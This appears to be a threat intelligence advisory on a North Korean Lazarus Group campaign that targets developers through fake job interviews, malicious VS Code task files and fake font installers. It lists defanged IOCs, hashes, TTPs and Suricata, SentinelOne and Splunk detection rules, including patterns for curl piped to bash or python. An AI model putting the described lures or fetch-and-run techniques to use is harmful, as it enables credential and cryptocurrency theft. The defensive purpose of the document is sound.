BLUF

 North Korean state-sponsored actors are targeting software engineers via fake job interviews, using malicious VS Code task files disguised as web fonts to deploy backdoors.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by Lazarus Group–style recruitment-based malware campaigns targeting software engineers and developer environments:

·       Low-end total cost: $450K – $1.1M

o   (single developer compromise, rapid containment, limited data exposure)

·       Typical expected range: $1.5M – $4.5M

o   (multiple endpoints affected, credential exposure, short operational disruption)

·       Upper-bound realistic scenarios: $6M – $12M

o   (credential reuse, cloud access abuse, crypto or IP loss)

Key Cost Drivers

·       Number of privileged developer accounts compromised

·       Scope of credential reuse across cloud, CI/CD, and SaaS platforms

·       Duration of attacker persistence prior to detection

·       Exposure of source code, proprietary algorithms, or cryptographic assets

·       Regulatory obligations triggered by employee or customer data access

Targeted Sectors

·       Technology

·       Software Engineering

·       Cryptocurrency.

Countries Targeted

·       Global

Date of First Reported Activity

·       Late 2025

Date of Last Reported Activity Update

·       January 26–27, 2026

APT Names

·       Lazarus Group

o   DPRK-linked

Associated Criminal Organizations

·       Not applicable at this time

IOCs

Malicious Infrastructure & Domains

·       api.nvidia-release[.]org

·       npmjscloud[.]com

·       npmrepos[.]com

·       tradingprice[.]net

·       coingeckoprice[.]com

·       blocknovas[.]com (Front company)

Malicious Packages & Tools

NPM Packages

·       tailwindcss-forms-kit

PyPI Packages

·       Modified versions of pyperclip and pyrebase

Operational Characteristics

·       GitHub Repositories

o   17–19 repositories identified as of early 2026, often appearing as standard React or Node.js projects.

·       VS Code Tasks

o   Look for unusual auto-run scripts in .vscode/tasks.json that execute external shell commands or JavaScript.

·       Exfiltration

o   Data is frequently exfiltrated to Dropbox, Google Drive, Firebase, or Telegram

Tools Used

·       Microsoft VS Code

·       GitHub

·       Node.js.

CVEs

·       Not applicable at this time

Mitigation

·       Do not grant "Trust" to unfamiliar VS Code workspaces

o   vet package.json and .vscode/tasks.json before running scripts.

Malware Names

·       InvisibleFerret (Python backdoor)

·       MoonPeak (XenoRAT variant)

Malware Samples

InvisibleFerret

sha256

b4c0519e769d97db2ded3f8949f1189ccec85ac4caec87824246aa463fe54031

Malware Family

·       InvisibleFerret (often paired with the BeaverTail loader/stealer).

Known Decoding Key

·       Uses XOR encryption with a hardcoded key for obfuscating exfiltrated files that do not match specific extensions.

Verdict

·       Malicious

o   Cross-platform Python-based backdoor/Remote Access Trojan

Primary Objectives

Data Exfiltration

Steals

·       Sensitive files

·       Browser credentials

·       Session cookies

·       Cryptocurrency Theft

o   Specifically targets 13+ types of crypto wallets (e.g., MetaMask) and password managers (e.g., 1Password).

Persistent Access

·       Establishes long-term control by downloading and executing remote desktop software like AnyDesk.

Behavior Analysis

Initial Access

·       Deployed as a second-stage payload by BeaverTail after victims are lured via fake job recruitment on LinkedIn or freelance sites.

Modular Architecture

·       Consists of four primary Python modules: main (fingerprinting), payload (remote control), browser (stealing), and AnyDesk (persistence).

Capabilities

·       Includes keylogging

·       Clipboard monitoring

·       Geolocation tracking

·       Automated fingerprinting.

Exfiltration Channels

·       Uses FTP

·       Encrypted connections

·       The Telegram Bot API (invoking sendDocument) to transmit stolen data.

Execution

·       Often triggered through malicious coding challenges, trojanized GitHub repositories, or abusing VS Code task automation (tasks.json)

Malware Samples

MoonPeak (XenoRAT variant)

sha256

847b4ad90b1daba2d9117a8e05776f3f902dda593fb1252289538acf476c4268

Malware Family

·       XenoRAT (customized variant)

Known Decoding Key

·       The AES key is derived from the SHA256 hash of a server-side password. The default password is 1234 with an IV of zero.

Verdict

·       Malicious

o   High-priority Remote Access Trojan (RAT).

Primary Objectives

·       Data Exfiltration

o   Stealing sensitive information from compromised hosts.

·       Establishment of Persistence

o   Maintaining long-term access to target infrastructure.

·       Foreign Currency Gain

o   Recent 2026 activities specifically target South Korean investors for financial profit.

·       Infrastructure Shift

o   Transitioned from using public cloud services (Dropbox, Google Drive) to attacker-owned private C2 servers to avoid provider-led shutdowns.

Behavior Analysis

·       Asynchronous Execution

o   Uses State Machines to execute code asynchronously, complicating reverse-engineering and disrupting traditional analysis flows.

·       Capabilities

o   Inherits XenoRAT features including keylogging, UAC bypass, Hidden Virtual Network Computing (HVNC), and plugin loading.

·       Evasion Techniques

o   Employs LZNT1 compression and AES encryption for C2 traffic, and increasingly introduces new obfuscation layers with each variant.

·       Living off the Land

o   Often uses legitimate system utilities like powershell.exe for execution and persistence.

TTPs

Initial Access

·       T1566.003 Phishing Spearphishing via Service

o   Threat actors pose as recruiters on platforms like LinkedIn or X to contact targets.

·       T1189 Drive-by Compromise

o   Victims are directed to fake interview websites or malicious GitHub repositories.

Execution

·       T1204.002 User Execution Malicious File

o   Victims are tricked into downloading and running a "coding task" or a "fake font" installer.

·       T1059.007 Command and Scripting Interpreter JavaScript

o   The campaign uses JavaScript-based malware (e.g., BeaverTail) often hidden in npm install scripts or fake font files.

·       T1053.003 Scheduled Task/Job System Task

o   Exploits Visual Studio Code's task automation feature to execute malware disguised as web fonts.

Persistence

·       T1547 Boot or Logon Autostart Execution

o   Malware such as InvisibleFerret is configured to run persistently on the system.

·       T1133 External Remote Services

o   The InvisibleFerret Python backdoor provides long-term remote access.

Evasion

·       T1036 Masquerading

o   Malware is delivered disguised as legitimate software drivers, video call applications, or web fonts.

·       T1027.010 Obfuscated Files or Information

o   Command Obfuscation: JavaScript code is obfuscated using Base64 and variable substitutions.

·       T1562.001 Impair Defenses Disable or Modify Tools

o   Actors convince victims to disable Docker or other container environments to bypass isolation.

Discovery

·       T1082 System Information Discovery

o   The GolangGhost backdoor and InvisibleFerret collect detailed host and system information.

·       T1083 File and Directory Discovery

o   Tools like the ss_ufind subcommand in InvisibleFerret search for specific files using patterns.

Credential Access

·       T1555 Credentials from Password Stores

o   BeaverTail specifically targets browser-stored credentials and credit card information.

·       T1539 Steal Web Session Cookie

o   Used by the BeaverTail infostealer to hijack sessions.

Collection & Exfiltration

·       T1641 Steal Cryptocurrency

o   The primary goal is exfiltrating private keys from over 13 different cryptocurrency wallets (e.g., Exodus, Binance).

·       T1070.004 Indicator Removal File Deletion

o   Malware is configured to delete archives used for collection after successful exfiltration.

·       T1041 Exfiltration Over C2 Channel

o   Data is exfiltrated to attacker-controlled infrastructure or third-party services like Dropbox.

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

·       Detect non-standard HTTP POST requests to known malicious IPs or domains (e.g., *.onion proxies or hardcoded C2 infrastructure).

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Lazarus Contagious Interview/BeaverTail C2 Check-in"; content:"POST"; http_method; content:"/check"; http_uri; pcre:"/data=[a-zA-Z0-9+/]+={0,2}/"; classtype:trojan-activity; sid:2026001; rev:1;)

SentinelOne

·       Search for curl or powershell processes launched from a browser (Chrome, Edge, Safari) that immediately pipe to an interpreter.

Process.Parent.Name in ("chrome.exe", "msedge.exe", "safari") AND Process.CommandLine contains "curl" AND (Process.CommandLine contains "bash" OR Process.CommandLine contains "python")

·       Suspicious Python/Node.js Child Processes

Process.Name in ("python", "python3", "node") AND (Process.CommandLine contains "http" OR Process.CommandLine contains "socket")

Splunk

·       Hunt for Malicious NPM/Python Package Installation

index=sysmon EventCode=1 (CommandLine="*npm install*" OR CommandLine="*pip install*") AND (CommandLine="*temp*" OR CommandLine="*Downloads*")

·       Detect the execution of scripts that spawn fake OS-level password prompts (like FROSTYFERRET).

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentImage="*python*" Image="*osascript*" CommandLine="*with prompt*" (specifically for macOS targets).

Delivery Method

·       Social engineering via fake job interviews and GitHub repository invitations.

Email sample

While exact text varies by target, the following components are standard in these recruitment-themed lures

Subject Lines

·       "Invitation to Technical Assessment: [Job Title]"

·       "Action Required: Software Developer Interview Tasks"

·       "Interview Follow-up: Troubleshooting Your Video Connection"

·       The "Fake Font" Lure:

During a staged video call or technical test:

·       The attacker claims the candidate cannot see a specific document or coding environment because they are missing a required font

·       Then they send an email or link to download a "font installer" (e.g., safarifontagent or a .dmg/.exe file) which is actually the BeaverTail or InvisibleFerret malware.

The "ClickFix" Variation (2025-2026)

·       A common 2026 evolution involves an email claiming a technical error occurred during the interview process (e.g., "Your camera/microphone is not working").

·       The email directs the victim to a "support" page (like blockchainjobhub[.]com) that instructs them to copy and paste a "fix" command into their terminal, which installs the backdoor.

References

Open Source Malware

·       hxxps://opensourcemalware.com/blog/contagious-code-fake-font

GB Hackers

·       hxxps://gbhackers.com/dprk-interview-campaign/

FireBlocks

·       hxxps://www.fireblocks.com/blog/contagious-interview-recruiting-scam

Blog Sekoia

·       hxxps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/

VirusTotal

·       hxxps://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/community

Any.run

·       hxxps://any.run/cybersecurity-blog/lazarus-group-attacks-2025/